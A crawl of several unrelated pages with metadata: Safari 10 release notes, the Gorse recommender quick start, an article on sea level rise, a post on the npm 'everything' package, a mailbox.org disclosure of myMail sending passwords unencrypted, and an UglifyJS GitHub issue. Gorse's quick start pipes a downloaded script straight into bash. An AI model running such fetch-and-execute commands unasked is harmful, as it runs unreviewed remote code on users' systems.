force changes. The event is the 3D Touch equivalent of `webkitmouseforcechanged` for WebKit in macOS. The values of the `force` property of `touch` objects range from `0.0` to `1.0` . ### WebGL The `antialias` context creation parameter is now supported in iOS. 
It defaults to `true`. The `alpha` context creation parameter now supports the value `false` in iOS. The total number of active WebGL contexts on a page is limited to 16. After that limit is reached, adding a new context causes the oldest context to be destroyed.

### Geolocation

Starting in Safari 10.0, unencrypted websites can no longer access Geolocation APIs. You must use a secure connection in order to access Geolocation APIs.

## Media

### Inline and Auto Video Playback in iOS

When the `playsinline` property is specified, Safari on iPhone allows videos to play inline. Videos without the property will commence playback in fullscreen, but users can pinch close on the video to continue playing it inline. On iOS, videos without audio tracks or with disabled audio tracks can play automatically when the webpage loads.

### Picture in Picture in macOS

Safari 10 brings Picture in Picture to macOS so users can watch video in a separate, resizable window that stays on top of other application windows and remains on-screen when switching desktop spaces. Safari's default HTML5 video controls include a new Picture in Picture control. If you use custom HTML5 video controls, you can add Picture in Picture functionality using the JavaScript presentation mode API.

## Text Features

### WOFF 2.0 Support

Web Open Font Format (WOFF) 2.0 support in Safari on macOS 10.12 and iOS 10 improves compression of website fonts, so fonts require less bandwidth to load.

### Font Loading

Web developers can use the CSS Font Loading Module Level 3 specification to create and load font faces from a script and track the loading status of fonts. Web fonts are downloaded only if the characters of the rendered text are within the font's Unicode range.

## Layout and Rendering

### CSS Support for Object Position

The `object-position` property controls where content in replaced elements—such as `video`, `img`, and `object`—is positioned inside the containing box element.
The `object-position` and `background-position` properties are used in a similar way.

### Support Clipping Using SVG Paths

You can clip to more sophisticated shapes, including Bezier path segments and the `evenodd` fill rule, by using a `path()` shape, as specified in the CSS Shapes Level 2 specification.

### Support for #RGBA and #RRGGBBAA

Safari accepts `#RGBA` and `#RRGGBBAA` color values as described in the CSS Color Level 4 specification.

### New Values for Border Image

The `round` and `space` values for the `border-image` CSS property are supported.

### New Values for Image Rendering

Support is available for `crisp-edges` and `pixelated` values for the `image-rendering` property. The prefixed values `-webkit-crisp-edges` and `-webkit-optimize-contrast` map to the `crisp-edges` value.

### Right-to-Left Language Support

The location of scrollbars and the appearance of form controls are adjusted based on the `direction` CSS property.

### Media Query for Wide Color Gamut Support

A media query added to CSS or picture elements provides different presentation styles when content is displayed on a device with a wide color gamut, such as the Display P3 color space.

`@media (color-gamut: p3) { … }`

### CSS Break Properties

The `break-after`, `break-before`, and `break-inside` CSS properties are now supported.

### Unprefixed CSS Features

The following CSS features are supported without the `-webkit-` prefix: `filter`, `cross-fade`, `image-rendering`.

### Accessibility

Pinch-to-zoom is always enabled for all users. The viewport setting for `user-scalable` is ignored.

## Web Inspector

### WebDriver Support

Safari on macOS supports `WebDriver`, which lets you automate web-content testing. It provides a set of interfaces to manipulate DOM elements and control the browser's behavior. You can enable Remote Automation in the Develop menu and then launch the server using `/usr/bin/safaridriver`.
For information about library integrations as they become available, see the information about Selenium WebDriver.

### Memory Debugging

Web Inspector includes new timelines to visualize web application memory usage and plots heap allocation snapshots over time. These tools help you identify areas to improve for optimal memory performance.

### Fast Sampling Profiler

The new JavaScript profiler delivers fast performance by sampling running code at a high resolution while disabling debugging tools. It allows scripts to run at full JIT-accelerated (just-in-time compilation) speeds for accurate timeline recording.

## Native APIs

### Apple Pay for the Web

You can give customers an easy, secure, and private way to pay for physical goods and services—such as groceries, clothing, tickets, reservations, and more. Users can check out with a single touch using Apple Pay with Touch ID on their iPhone, or by double-clicking the side button on Apple Watch. To incorporate Apple Pay into your websites, see *ApplePay JS Framework Reference*.

### WKWebView Preview Actions

The updated `WKWebView` API supports link previews that display a custom view controller. With this API, you can create views using Peek and Pop inside your app instead of popping to Safari, and you can specify custom preview actions.

- The new methods are part of the `WKUIDelegate` class: `webView:shouldPreviewElement:`, `webView:previewingViewControllerForElement:defaultActions:`, and `webView:commitPreviewingViewController:`.
- The `WKWebView.allowsLinkPreview` property defaults to `YES` in apps for iOS 10.0 or later.

### Safari View Controller

Safari View Controller on iOS 10 now supports color tinting for view bar backgrounds. Combined with the color tinting of UI control elements (available in iOS 9), Safari View Controller can be customized to provide your users a cohesive look for their in-app experience.
### WKWebView Behavior with Keyboard Displays

Safari and `WKWebView` on iOS 10 do not update the `window.innerHeight` property when the keyboard is shown. On previous versions of iOS, `WKWebView` would update the `window.innerHeight` property when the keyboard is shown.

## Safari App Extensions

You can now create macOS-native Safari app extensions to sell and distribute in the App Store. Content Blockers for iOS can be easily ported to macOS; macOS apps can extend into Safari; and injected scripts and applied styles can extend web content. To get started with extensions, see *Safari App Extension Programming Guide*.

The `make-https` action is now available for iOS content blockers. The action changes a URL from `http` to `https` before making a server request. URLs with a specified port (other than the default port 80) and links using other protocols are not affected.

Copyright © 2018 Apple Inc. All Rights Reserved. Updated: 2018-02-22
true
true
true
Describes new features introduced in versions of Safari.
2024-10-12 00:00:00
2018-02-22 00:00:00
null
null
null
Copyright 2018 Apple Inc. All Rights Reserved.
null
null
38,475,950
https://gorse.io/
Home
null
### Multi-source

Recommend items from popular, latest, user-based, item-based, and collaborative filtering sources.

### AutoML

Search the best recommendation model automatically in the background.

### Distributed prediction

Support horizontal scaling in the recommendation stage after single-node training.

### RESTful APIs

Expose RESTful APIs for data CRUD and recommendation requests.

### Multi-database support

Support Redis, MySQL, Postgres, MongoDB, and ClickHouse as its storage backend.

### Online evaluation

Analyze online recommendation performance from recently inserted feedback.

### Dashboard

Provide a GUI for data management, system monitoring, and cluster status checking.

### Open source

The codebase is released under the Apache 2 license and driven by the community.

Gorse is an open-source recommendation system written in Go. Gorse aims to be a universal open-source recommender system that can be easily introduced into a wide variety of online services. By importing items, users, and interaction data into Gorse, the system will automatically train models to generate recommendations for each user.

# Quick Start

The playground mode has been prepared for beginners. Just set up a recommender system for GitHub repositories by following the commands.

```shell
curl -fsSL https://gorse.io/playground | bash
```

```shell
docker run -p 8088:8088 zhenghaoz/gorse-in-one --playground
```

The playground mode will download data from GitRec and import it into Gorse. The dashboard is available at http://localhost:8088. After the "Find neighbors of items" task is completed on the "Tasks" page, try to insert several feedbacks into Gorse. Suppose Bob is a frontend developer who starred several frontend repositories in GitHub. We insert his star feedback into Gorse.
```shell
read -d '' JSON << EOF
[
    { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"vuejs:vue\", \"Timestamp\": \"2022-02-24\" },
    { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"d3:d3\", \"Timestamp\": \"2022-02-25\" },
    { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"dogfalo:materialize\", \"Timestamp\": \"2022-02-26\" },
    { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"mozilla:pdf.js\", \"Timestamp\": \"2022-02-27\" },
    { \"FeedbackType\": \"star\", \"UserId\": \"bob\", \"ItemId\": \"moment:moment\", \"Timestamp\": \"2022-02-28\" }
]
EOF

curl -X POST http://127.0.0.1:8088/api/feedback \
    -H 'Content-Type: application/json' \
    -d "$JSON"
```

```go
import "github.com/zhenghaoz/gorse/client"

gorse := client.NewGorseClient("http://127.0.0.1:8088", "")

gorse.InsertFeedback([]client.Feedback{
    {FeedbackType: "star", UserId: "bob", ItemId: "vuejs:vue", Timestamp: "2022-02-24"},
    {FeedbackType: "star", UserId: "bob", ItemId: "d3:d3", Timestamp: "2022-02-25"},
    {FeedbackType: "star", UserId: "bob", ItemId: "dogfalo:materialize", Timestamp: "2022-02-26"},
    {FeedbackType: "star", UserId: "bob", ItemId: "mozilla:pdf.js", Timestamp: "2022-02-27"},
    {FeedbackType: "star", UserId: "bob", ItemId: "moment:moment", Timestamp: "2022-02-28"},
})
```

```python
from gorse import Gorse

client = Gorse('http://127.0.0.1:8088', '')

client.insert_feedbacks([
    { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'vuejs:vue', 'Timestamp': '2022-02-24' },
    { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'd3:d3', 'Timestamp': '2022-02-25' },
    { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'dogfalo:materialize', 'Timestamp': '2022-02-26' },
    { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'mozilla:pdf.js', 'Timestamp': '2022-02-27' },
    { 'FeedbackType': 'star', 'UserId': 'bob', 'ItemId': 'moment:moment', 'Timestamp': '2022-02-28' }
])
```

```javascript
import { Gorse } from "gorsejs";

const client = new Gorse({ endpoint: "http://127.0.0.1:8088", secret: "" });

await client.insertFeedbacks([
    { FeedbackType: 'star', UserId: 'bob', ItemId: 'vuejs:vue', Timestamp: '2022-02-24' },
    { FeedbackType: 'star', UserId: 'bob', ItemId: 'd3:d3', Timestamp: '2022-02-25' },
    { FeedbackType: 'star', UserId: 'bob', ItemId: 'dogfalo:materialize', Timestamp: '2022-02-26' },
    { FeedbackType: 'star', UserId: 'bob', ItemId: 'mozilla:pdf.js', Timestamp: '2022-02-27' },
    { FeedbackType: 'star', UserId: 'bob', ItemId: 'moment:moment', Timestamp: '2022-02-28' }
]);
```

```java
import io.gorse.gorse4j.*;

Gorse client = new Gorse(GORSE_ENDPOINT, GORSE_API_KEY);

List<Feedback> feedbacks = List.of(
    new Feedback("star", "bob", "vuejs:vue", "2022-02-24"),
    new Feedback("star", "bob", "d3:d3", "2022-02-25"),
    new Feedback("star", "bob", "dogfalo:materialize", "2022-02-26"),
    new Feedback("star", "bob", "mozilla:pdf.js", "2022-02-27"),
    new Feedback("star", "bob", "moment:moment", "2022-02-28")
);
client.insertFeedback(feedbacks);
```

```rust
use gorse_rs::{Feedback, Gorse};

let client = Gorse::new("http://127.0.0.1:8088", "");

let feedback = vec![
    Feedback::new("star", "bob", "vuejs:vue", "2022-02-24"),
    Feedback::new("star", "bob", "d3:d3", "2022-02-25"),
    Feedback::new("star", "bob", "dogfalo:materialize", "2022-02-26"),
    Feedback::new("star", "bob", "mozilla:pdf.js", "2022-02-27"),
    Feedback::new("star", "bob", "moment:moment", "2022-02-28")
];
client.insert_feedback(&feedback).await;
```

```ruby
require 'gorse'

client = Gorse.new('http://127.0.0.1:8088', 'api_key')

client.insert_feedback([
    Feedback.new("star", "bob", "vuejs:vue", "2022-02-24"),
    Feedback.new("star", "bob", "d3:d3", "2022-02-25"),
    Feedback.new("star", "bob", "dogfalo:materialize", "2022-02-26"),
    Feedback.new("star", "bob", "mozilla:pdf.js", "2022-02-27"),
    Feedback.new("star", "bob", "moment:moment", "2022-02-28")
])
```

```php
$client = new Gorse("http://127.0.0.1:8088/", "api_key");

$rowsAffected = $client->insertFeedback([
    new Feedback("star", "bob", "vuejs:vue", "2022-02-24"),
    new Feedback("star", "bob", "d3:d3", "2022-02-25"),
    new Feedback("star", "bob", "dogfalo:materialize", "2022-02-26"),
    new Feedback("star", "bob", "mozilla:pdf.js", "2022-02-27"),
    new Feedback("star", "bob", "moment:moment", "2022-02-28")
]);
```

```csharp
using Gorse.NET;

var client = new Gorse("http://127.0.0.1:8088", "api_key");

client.InsertFeedback(new Feedback[]
{
    new Feedback{FeedbackType="star", UserId="bob", ItemId="vuejs:vue", Timestamp="2022-02-24"},
    new Feedback{FeedbackType="star", UserId="bob", ItemId="d3:d3", Timestamp="2022-02-25"},
    new Feedback{FeedbackType="star", UserId="bob", ItemId="dogfalo:materialize", Timestamp="2022-02-26"},
    new Feedback{FeedbackType="star", UserId="bob", ItemId="mozilla:pdf.js", Timestamp="2022-02-27"},
    new Feedback{FeedbackType="star", UserId="bob", ItemId="moment:moment", Timestamp="2022-02-28"},
});
```

Then, fetch 10 recommended items from Gorse. We can find that frontend-related repositories are recommended for Bob.

```shell
curl http://127.0.0.1:8088/api/recommend/bob?n=10
```

```go
gorse.GetRecommend("bob", "", 10)
```

```python
client.get_recommend('bob', n=10)
```

```javascript
await client.getRecommend({ userId: 'bob', cursorOptions: { n: 10 } });
```

```java
client.getRecommend("bob");
```

```rust
client.get_recommend("bob").await;
```

```ruby
client.get_recommend('bob')
```

```php
$client->getRecommend('bob');
```

```csharp
client.GetRecommend("bob");
```

```json
[
    "mbostock:d3",
    "nt1m:material-framework",
    "mdbootstrap:vue-bootstrap-with-material-design",
    "justice47:f2-vue",
    "10clouds:cyclejs-cookie",
    "academicpages:academicpages.github.io",
    "accenture:alexia",
    "addyosmani:tmi",
    "1wheel:d3-starterkit",
    "acdlite:redux-promise"
]
```

The exact output might be different from the example since the playground dataset changes over time.
true
true
true
Gorse is an open-source recommendation system written in Go. Gorse aims to be a universal open-source recommender system that can be easily introduced into a wide variety of online services. By importing items, users and interaction data into Gorse, the system will automatically train models to generate recommendations for each user.
2024-10-12 00:00:00
2023-04-05 00:00:00
https://gorse.io/
website
gorse.io
Gorse
null
null
201,635
http://technology.timesonline.co.uk/tol/news/tech_and_web/article4015809.ece
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
30,358,575
https://theconversation.com/what-drives-sea-level-rise-us-report-warns-of-1-foot-rise-within-three-decades-and-more-frequent-flooding-177211
What drives sea level rise? US report warns of 1-foot rise within three decades and more frequent flooding
Jianjun Yin
Sea levels are rising, and that will bring profound flood risks to large parts of the Gulf and Atlantic coasts over the next three decades.

A new report led by scientists at the National Oceanic and Atmospheric Administration warns that the U.S. should prepare for 10-12 inches of relative sea level rise on average in the next 30 years. The rise is due to both sinking land and global warming. And given the greenhouse emissions released so far, the country is unlikely to be able to avoid it.

That much sea level rise means cities like Miami that see nuisance flooding during high tides today will experience more damaging floods by midcentury. Nationally, the report expects moderate coastal flooding will occur 10 times as often by 2050. Without significant adaptations, high tides will more frequently pour into streets and disrupt coastal infrastructure, including ports that are essential for supply chains and the economy. The higher ocean will also bring seawater farther inland. By the end of the century, an average of 2 feet of sea level rise or more is likely, depending on how much the world cuts greenhouse gas emissions.

As a geoscientist, I study sea level rise and the effects of climate change. Here's a quick explanation of two main ways global warming is affecting ocean levels and their threat to the coasts.

## Ocean thermal expansion

As greenhouse gases from fossil fuel use and other human activities accumulate in the atmosphere, they trap energy that would otherwise escape into space. That energy causes average global surface temperatures to rise, especially the upper layers of the ocean.

Thermal expansion happens when the ocean heats up. The heat causes sea water molecules to move slightly farther apart, taking up more space. The result is the ocean rises higher, flooding more land. Over the past several decades, about 40% of global sea level rise has been due to the effect of thermal expansion.
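To make the mechanism concrete, here is a back-of-the-envelope sketch. All the numbers in it are illustrative assumptions of mine, not figures from the NOAA report: if a surface layer of depth H warms uniformly by ΔT, the column rises by roughly α·ΔT·H, where α is the thermal expansion coefficient of seawater (on the order of 2×10⁻⁴ per °C near the surface).

```python
# Rough estimate of sea level rise from thermal expansion alone.
# All values below are illustrative assumptions, not data from the report.
ALPHA = 2e-4     # thermal expansion coefficient of seawater, per deg C (upper ocean)
DEPTH_M = 700.0  # depth of the warming surface layer, in metres
WARMING_C = 0.5  # assumed uniform warming of that layer, in deg C

def thermal_expansion_rise(alpha, depth_m, warming_c):
    """Return sea level rise in metres for a uniformly warmed layer."""
    return alpha * depth_m * warming_c

rise = thermal_expansion_rise(ALPHA, DEPTH_M, WARMING_C)
print(f"~{rise * 100:.0f} cm of rise")  # ~7 cm for these inputs
```

Even half a degree of warming spread through the upper ocean translates into centimetres of rise, which is why thermal expansion accounts for such a large share of the observed trend.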
The ocean, which covers about two-thirds of the Earth's surface, has been absorbing and storing more than 90% of the excess heat added to the climate system due to greenhouse gas emissions.

## Melting land ice

The other major factor in rising sea levels is melting land ice. Mountain glaciers and polar ice sheets are diminishing at rates faster than natural systems can replace them. When land ice melts, that meltwater eventually flows into the ocean, adding new quantities of water to the ocean and increasing the total ocean mass. About 50% of global sea level rise was induced by land ice melt during the past several decades.

Currently, the polar ice sheets in Greenland and Antarctica hold enough frozen water that if they melted completely, it would raise the global sea level by up to 200 feet, or 60-70 meters – about the height of the Statue of Liberty.

Climate change is melting sea ice as well. However, because this ice already floats at the ocean's surface and displaces a certain amount of liquid water below, this melting does not contribute to sea level rise.

## Risk will keep rising long after emissions stabilize

While the surface height of the ocean rises globally as the planet warms, the impact is not the same for every coastal region. The rate of rise can be several times faster in some places due to unique local conditions, such as shifts in ocean circulation or the subsidence of the land. The U.S. East Coast and Gulf Coast, for example, face risks above the average, according to the new report, while the West Coast and Hawaii are projected to be lower than average. Nearly 4 in 10 U.S. residents live near a coastline, and a large part of the U.S. economy is there, as well.

Even when greenhouse gas emissions eventually fall, sea level will keep rising for centuries because the massive ice sheets in Greenland and Antarctica will continue to melt and take a very long time to reach a new equilibrium.
A 2021 report from the Intergovernmental Panel on Climate Change shows the excess heat already in the climate system has locked in the current rates of thermal expansion and land ice melt for at least the next few decades.
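The "up to 200 feet" figure for the two ice sheets can be sanity-checked with a quick back-of-envelope calculation. A minimal sketch follows; the sea-level-equivalent values are assumptions drawn from commonly cited published estimates, not figures given in this article:

```python
# Back-of-envelope check of the "up to 200 feet, or 60-70 meters" claim,
# using commonly cited sea-level-equivalent (SLE) estimates for the two
# polar ice sheets. The SLE numbers below are assumptions, not article data.
ANTARCTICA_SLE_M = 58.3  # metres of global sea level locked in Antarctic ice
GREENLAND_SLE_M = 7.4    # metres locked in the Greenland ice sheet

def total_ice_sheet_rise_feet():
    total_m = ANTARCTICA_SLE_M + GREENLAND_SLE_M
    return total_m, total_m * 3.28084  # metres -> feet

metres, feet = total_ice_sheet_rise_feet()
print(f"{metres:.1f} m ~ {feet:.0f} ft")  # → 65.7 m ~ 216 ft
```

The result lands squarely inside the article's 60-70 meter range and close to the "200 feet" round number.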
true
true
true
A sea level scientist explains the two main ways climate change is threatening the coasts.
2024-10-12 00:00:00
2022-02-16 00:00:00
https://images.theconver…6&h=668&fit=crop
article
theconversation.com
The Conversation
null
null
31,143,681
https://blackwingpages.com/2022/03/17/eberhard-faber-pencil-names-and-numbers/
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
608,305
http://www.codinghorror.com/blog/archives/001266.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,197,658
https://www.axios.com/2024/01/30/ransomware-pay-out-decline-chart
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,723,988
https://uncenter.dev/posts/npm-install-everything/
The package that broke npm (accidentally) - uncenter.dev
null
# The package that broke npm (accidentally)

## An update!

## You might want to read the rest of the article first...

GitHub has now, a day after writing this, fully "disabled" (whatever that means) our `everything-registry` organization on NPM and GitHub; you can see the email they sent to me below. While I may not agree entirely with the reasoning they provided, I am very thankful that our personal accounts are still intact!

## Email from GitHub Trust & Safety

All of our scoped packages have been deleted, so unpublishing packages should no longer be an issue. Another note; this story was picked up by some media outlets in the cybersecurity world! SC Media, Checkmarx, and BleepingComputer.

## The aforementioned articles

Ten years ago, PatrickJS created the `everything` package on NPM, containing every package on the NPM registry in the first 5 years of the registry's existence. The package remained the same for years, but that all changed just a few days ago with a single tweet. I saw the tweet on my timeline and made a quick PR to clean up a few things and help bring the repository up to speed. At the same time, Patrick had started an attempt to publish a `2.0.0` version of the package, but he discovered that there was now a `10` megabyte limit for the uncompressed size of a package. I made a comment about the issue and we quickly began brainstorming a solution.

## Brainstorming...

We moved to Twitter DMs, and by this time others who saw Trash's tweet wanted to join — Hacksore, and Trash himself. We came up with a plan to divide the ~2.5m packages into "scoped" groups of packages; a group for packages starting with the letter "a", the letter "b", and the rest of the alphabet, and then the numbers "0" to "9", and finally an "other" category for anything else. Since each of these scoped packages would only be a subset of the total, they would easily pass the size limit, and the main `everything` package could just depend on each of these scoped packages.
## Unforeseen issues

I began implementing some code to generate the required packages, and a few hours later we were ready to go, except we forgot one thing. Or, rather, NPM didn't tell us one thing. It turns out that NPM has a limit for how many dependencies a package can have. And we were apparently *way* over it. NPM has no apparent documentation on this and the limit wasn't visible in any public source code (the registry is private), so Hacksore did some testing and discovered the limit to be 800 dependencies. At the current range of 90k to 300k dependencies per scoped package... we needed a new plan.

## Back to the drawing board

I suggested a new, very basic plan: just split them into "chunks" (groups) of 800 dependencies. This leaves 3246 groups though, and 3246 is still too many for our main `everything` package to hold. So we simply "chunk" the 3246 groups of 800 into groups of 800 again.

## 3...2...1... go!

Set on our new plan, we updated the code and triggered our GitHub Actions workflow... It worked! The GitHub Action logs rolled in, one after another, as the packages slowly got published. We had a brief scare after realizing that GitHub Actions jobs and workflows have a maximum run time that we might reach, but some quick calculations revealed that we had no cause for worry. Workflow jobs time out after 6 hours, and at the current rate of one package published every ~4.5 seconds, we could comfortably publish 4,800+ packages in that time. We all went back to doing other things, and I checked the logs occasionally. Half an hour later though, we ran into a different problem... we had been rate limited. In 32 minutes, we had published 454 packages: the main `everything` package, all five "chunks", but only 448 "sub-chunks". It was only a fraction (roughly 14%) of everything (hah, pun intended) we needed to publish.

## What next??
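The chunking scheme described above can be sketched in a few lines. This is an illustration under the constraints the article names (an apparent 800-dependency limit and roughly 2.5 million packages), not the authors' actual script:

```python
# Sketch of the two-level chunking plan: split the package list into
# "sub-chunks" of at most 800 dependencies (NPM's apparent limit), then
# group those sub-chunks into "chunks" of at most 800, which the single
# top-level `everything` package can depend on.

def chunk(items, size=800):
    """Split an indexable sequence into consecutive groups of <= size."""
    return [items[i:i + size] for i in range(0, len(items), size)]

all_packages = range(2_500_000)       # stand-in for ~2.5M registry package names

sub_chunks = chunk(all_packages)      # groups of <= 800 packages each
chunks = chunk(sub_chunks)            # groups of <= 800 sub-chunks each

print(len(sub_chunks), len(chunks))   # → 3125 4
```

With the real (slightly larger, uneven) registry snapshot, the same scheme works out to the 3246 sub-chunks and 5 chunks mentioned in the article.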
I made a quick fix before heading to bed to skip the packages we had already published, but we still didn't have any sort of plan to deal with rate limiting. Overnight between the 29th and the 30th, we settled on a new plan. We would periodically run a workflow that publishes as many packages as it can, and then the workflow saves the work it did to the repository so the next run can pick up where the last one left off. I replaced the sketchy manual intervention from the night before with a proper `published.json` file to keep track of the published packages, and initialized it. I wrote a release script that wrote back to `published.json` after publishing each package (I know, I know, this could be better) and added a step to the workflow to commit the changes after each run. After a few hiccups, it finally worked!

So it began. Throughout the day I (very irregularly) manually dispatched the workflow. For a while, we sat and waited. We even began an effort to actually run `npm install everything` (well, `yarn add everything`) and put up a Twitch stream of the installation on a virtual machine. We also made a website! Many thanks to the rest of the contributors I have mentioned so far, but notably to Evan Boehs for leading the charge and to PickleNik for making it look nice.

## Finale

Finally, at 11:27 PM, the final workflow run completed, publishing the last 20 sub-chunks. All 5 chunks, 3246 sub-chunks, and the main `everything` package. In total, depending on over 2.5 million NPM packages!

## A vulnerability?

The initial response to our endeavour was... not positive. People began coming to the repository, complaining about not being able to unpublish. What?! We looked into it, and it turns out that the issue was our usage of "star" versions; that is, specifying the version not as a typical semantic version in the format of `X.Y.Z`, but as `*`. The star means "any and all" versions of a package - here is where the issue lies.
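The `published.json` checkpointing idea can be sketched roughly as follows. This is a simplified model of the workflow, not the actual release script, and `try_publish` is a hypothetical stand-in for the real `npm publish` invocation:

```python
# Sketch of resumable publishing with a `published.json` checkpoint file:
# each run skips packages already published and stops cleanly when the
# registry rate-limits us, so the next run picks up where this one left off.
import json
import os

STATE_FILE = "published.json"

def load_state():
    """Read the set of already-published package names, if any."""
    if os.path.exists(STATE_FILE):
        with open(STATE_FILE) as f:
            return set(json.load(f))
    return set()

def save_state(done):
    with open(STATE_FILE, "w") as f:
        json.dump(sorted(done), f)

def publish_all(packages, try_publish):
    """try_publish(name) -> bool; False signals e.g. a rate limit."""
    done = load_state()
    for name in packages:
        if name in done:
            continue              # published in an earlier run
        if not try_publish(name):
            break                 # stop now; the next run resumes here
        done.add(name)
        save_state(done)          # checkpoint after every publish
    return done
```

Checkpointing after every single publish (rather than once at the end) is what makes an abrupt rate-limit stop harmless.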
NPM blocks package authors from unpublishing a package if another package depends on that version of it. But since the star matches *all* versions, no version of the package can be unpublished. This is usually harmless, but our (unintentional) use of it on a large scale prevented *anyone* from unpublishing.

We immediately reached out to GitHub; Patrick used his network and contacts to speak to people at GitHub, and we sent multiple emails to the support and security teams on NPM. Unfortunately, these events transpired over the holidays and the NPM/GitHub teams were not responding (likely out of the office). We continued to get harsh and rude comments from random people with a little too much time on their hands... one person even wrote a 1,400-word rant about the unpublishing issue, despite us repeatedly telling them we could do nothing further.

Thankfully, on the night of January 2nd, GitHub reached out and let us know they were aware of the problem. On the 3rd of January, we received a notice that our GitHub organization had been "flagged" and our organization and repositories were hidden. Not what we wanted to see, but progress nonetheless. They also began removing our organization's scoped packages on NPM, as we had suggested. The initial problem had been solved, but we are still waiting to see how NPM prevents this issue in the future. My two cents: NPM should either a) prevent folks from publishing packages with star versions in the package.json entirely, or b) not count a dependent that uses a star version when tallying how many packages depend on a given version for unpublishing purposes.

Lastly, I want to apologize to anyone frustrated, annoyed, or just angry at us. We made a mistake, and we've owned up to it. This all started as a harmless joke and we had no intentions of breaking, abusing, or doing any sort of damage to the registry. In short we, uhh... fucked around and found out. Thanks for reading this, and have a lovely day!
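A toy model makes the star-version problem concrete. The matcher below is deliberately simplified (real semver ranges are far richer), but it shows why a single `*` dependent blocks unpublishing every version:

```python
# Toy illustration of the unpublish rule: NPM refuses to unpublish a
# version that some other package depends on, and a "*" spec matches
# every version, so nothing can ever be removed.

def spec_matches(spec, version):
    """Deliberately simplified stand-in for semver range matching."""
    return spec == "*" or spec == version

def can_unpublish(version, dependent_specs):
    """dependent_specs: version ranges other packages declared on us."""
    return not any(spec_matches(spec, version) for spec in dependent_specs)

# With an exact pin, only that one version is blocked:
print(can_unpublish("1.0.0", ["1.0.1"]))  # → True  (1.0.0 may be removed)
# With a star dependency, *every* version is blocked:
print(can_unpublish("1.0.0", ["*"]))      # → False
print(can_unpublish("9.9.9", ["*"]))      # → False
```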
*Now* you can read the update if you haven't already!
true
true
true
How we made a package that depends on every single npm package... and completely broke npm in the process.
2024-10-12 00:00:00
2024-01-03 00:00:00
https://uncenter.dev/102…g?v=2316a73de1f9
article
uncenter.dev
uncenter.dev
null
null
35,845,308
https://mailbox.org/en/post/mailbox-org-discovers-unencrypted-password-transmission-in-mymail
mailbox.org discovers unencrypted password transmission in myMail | mailbox.org
null
# mailbox.org discovers unencrypted password transmission in myMail

At mailbox.org, security and privacy are of the utmost importance to us, particularly in the area of email communication. Therefore, we would like to inform you about a critical security vulnerability in the myMail client for iOS that we have recently discovered. This vulnerability results in unencrypted transmission of user passwords and emails.

Our team became aware of the issue after our customers reported transmission errors when sending emails via the myMail client in the user forum. Upon a thorough examination of the logs, we found that the myMail app attempts to transmit passwords without the required TLS encryption, thus leaving them unprotected and posing a significant security risk. Instead of sending the usual "STARTTLS" command after establishing a connection, the app continued to transmit the user's login details unencrypted. As a result, we were able to extract users' passwords from the connection logs. At mailbox.org, we consistently reject unencrypted connections on our servers to ensure your security at all times. It was only for this reason that the myMail app's connection attempts failed, bringing the issue to our attention.

This problem not only affects our customers but also poses a general security risk for all users who use the myMail client. Contents and passwords can be intercepted and read by third parties, especially when users are in an open network. If other providers allow unencrypted connections and are used in conjunction with the current version of the myMail app, attackers can also read the content of unencrypted emails.

We strongly recommend that you stop using the myMail client with our service or other email providers until the app developers have resolved these security issues. There are numerous alternative email clients that offer higher security standards and better protect your privacy.
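The failure mode can be illustrated with a small checker over a recorded command sequence. This is a hedged sketch of the general STARTTLS rule (credentials only after TLS is negotiated), not the tooling mailbox.org actually used, and it ignores protocol details such as IMAP command tags and server responses:

```python
# Sketch: scan a client's command transcript (e.g. from a connection log)
# and flag any LOGIN/AUTH command issued before STARTTLS. A client that
# does this would send the password across the wire in cleartext.

def leaks_credentials(commands):
    """commands: client commands in the order they were sent."""
    tls_active = False
    for cmd in commands:
        word = cmd.strip().upper()
        if word.startswith("STARTTLS"):
            tls_active = True  # assume the TLS handshake then succeeds
        elif word.startswith(("LOGIN", "AUTH")) and not tls_active:
            return True        # credentials would cross the wire unencrypted
    return False

# The buggy behaviour described above: credentials first, no STARTTLS.
print(leaks_credentials(["LOGIN alice hunter2"]))              # → True
# A correct client: negotiate TLS first, then authenticate.
print(leaks_credentials(["STARTTLS", "LOGIN alice hunter2"]))  # → False
```

A server that rejects plaintext connections outright, as mailbox.org's do, turns this silent leak into a visible connection failure, which is exactly how the bug surfaced.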
At the same time, the current incident underscores the importance of communicating exclusively through securely configured systems that enforce encryption.
true
true
true
The mailbox.org team has discovered a critical vulnerability in the myMail client for iOS.
2024-10-12 00:00:00
2023-04-26 00:00:00
https://mailbox.org/file…log-exchange.jpg
null
null
mailbox.org discovers unencrypted password transmission in myMail
null
null
14,541,021
https://github.com/mishoo/UglifyJS2/issues/2054
npm install of 2.8.28 is downloading files with timestamp of Dec 31, 1969 · Issue #2054 · mishoo/UglifyJS
Mishoo
# npm install of 2.8.28 is downloading files with timestamp of Dec 31, 1969 #2054

## Comments

I'm afraid not much can be done over here - maybe try asking | One thing I can add is | Pretty sure the issue is on your side. 2.8.27 is fine as well. It's only 2.8.28 that is "corrupted." | Unless the package is unusable, I wouldn't be too bothered by it. And there is no way I can influence the behaviour of | The package is not usable. I cannot zip up the build folder because zip cannot handle files with a creation date before 1980. I had to switch to 2.8.27. Can you not just republish 2.8.28 to fix these timestamps? | | So that I can create a package for deploying the application along with npm dependencies to a test environment. Edit: can you try pushing a new version, 2.8.29? | And even if I were to publish As advised above, please contact | I can almost guarantee that if I open a ticket with npm and/or nodejs about a specific npm module on a specific version having corrupted timestamps they're going to point the finger back at this module. | I just downloaded your tgz file DIRECTLY from npm, and it's corrupted IN the tgz file: | Regardless of who is to blame here, you have to resolve this somehow. You have a corrupted tarball on the latest 2.x version available. It's not my responsibility to figure out why your publish corrupted the timestamps on these files. | Why is this issue closed? The package you published to npm has corrupt file metadata.
